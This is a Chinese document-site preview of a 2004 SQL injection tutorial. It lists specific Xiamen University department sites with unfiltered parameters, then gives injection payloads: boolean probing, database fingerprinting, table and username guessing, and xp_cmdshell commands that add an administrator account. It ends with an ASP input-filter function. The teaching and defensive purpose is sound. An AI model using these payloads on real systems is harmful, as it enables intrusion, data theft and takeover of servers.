SQL注入漏洞全接触_第1页
SQL注入漏洞全接触_第2页
SQL注入漏洞全接触_第3页
SQL注入漏洞全接触_第4页
SQL注入漏洞全接触_第5页
已阅读5页,还剩7页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

SQL注入漏洞全接触2004-5-111网站评比中发现的问题经济学院 serv-u版本太低,对于新闻的ID传入没有进行过滤,网上办公系统也有很大漏洞 外文学院 ID传入没有进行过滤 软件学院 站内搜索没有对'进行过滤 台湾研究院 ID传入没有进行过滤,开放SMTP,NNTP等不必要服务 管理学院 serv-u版本太低,SMTP匿名发送,ID传入没有进行过滤 厦大医院 ID传入没有进行过滤 党委宣传部 ID传入没有进行过滤 化学化工学院 ID传入没有进行过滤 校工会 ID传入没有进行过滤 党委组织部 ID传入没有进行过滤 职业技术学院 ID传入没有进行过滤 图书馆 ID传入没有进行过滤 国际处 ID传入没有进行过滤 人事处 ID传入没有进行过滤 法学院 ID传入没有进行过滤,serv-u版本太低 资产与后勤事务管理处 ID传入没有进行过滤 2SQL注入原理‘MicrosoftOLEDBProviderforODBCDrivers错误'80040e14'[Microsoft][ODBCMicrosoftAccessDriver]字符串的语法错误在查询表达式'id=772''中。/displaynews.asp,行31说明:

数据库为Access程序没有对于id进行过滤数据库表中有个字段名为id3判断能否进行SQL注入1.and1=12.and1=2如果1显示正常,2显示错误,或者没有页面,则表明可以进行SQL注入4判断数据库类型anduser>0 user是SQLServer的内置变量 1.and(selectcount(*)fromsysobjects)>0

2.and(selectcount(*)frommsysobjects)>0如果1正常,则表示Sqlserver.5注入方法(A)ID=49这类注入的参数是数字型,SQL语句原貌大致如下:

Select*from表名where字段=49

注入的参数为ID=49And[查询条件],即是生成语句:

Select*from表名where字段=49And[查询条件]

(B)Class=连续剧这类注入的参数是字符型,SQL语句原貌大致概如下:

Select*from表名where字段=’连续剧’

注入的参数为Class=连续剧’and[查询条件]and‘’=’,即是生成语句:

Select*from表名where字段=’连续剧’and[查询条件]and‘’=’’

(C)搜索时没过滤参数的,如keyword=关键字,SQL语句原貌大致如下:

Select*from表名where字段like’%关键字%’

注入的参数为keyword=’and[查询条件]and‘%25’=’,即是生成语句:

Select*from表名where字段like’%’and[查询条件]and‘%’=’%’6猜表名ID=49And(SelectCount(*)fromAdmin)>=0表名猜出来后,将Count(*)替换成Count(字段名),and(selecttop1len(username)fromAdmin)>0猜用户名长度and(selecttop1asc(mid(username,1,1))fromAdmin)>0猜用户名

7利用系统表注入SQLServer数据库id=1;execmaster..xp_cmdshell“netusernamepassword/add”–创建系统用户Id=1;execmaster..xp_cmdshell“netlocalgroupnameadministrators/add”--

把该用户加入administrators组id=1;backupdatabase数据库名todisk=’c:\inetpub\\1.db’;--

备份数据库…..8绕过程序限制继续注入wherextype=’U’wherextype=char(85)9防范方法FunctionSafeRequest(ParaName,ParaType)

'---传入参数---

'ParaName:参数名称-字符型

'ParaType:参数类型-数字型(1表示以上参数是数字,0表示以上参数为字符)

DimParaValue

ParaValue=Request(ParaName)

IfParaType=1then

IfnotisNumeric(ParaValue)then

Response.write"参数"&ParaName&"必须为数字型!"

Response.end

Endif

Else

ParaValue=replace(ParaValue,"'","''")

Endif

SafeRequest=ParaValue

Endfunction10加强SQLServer安全IP安全策略里面,将TCP1433

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论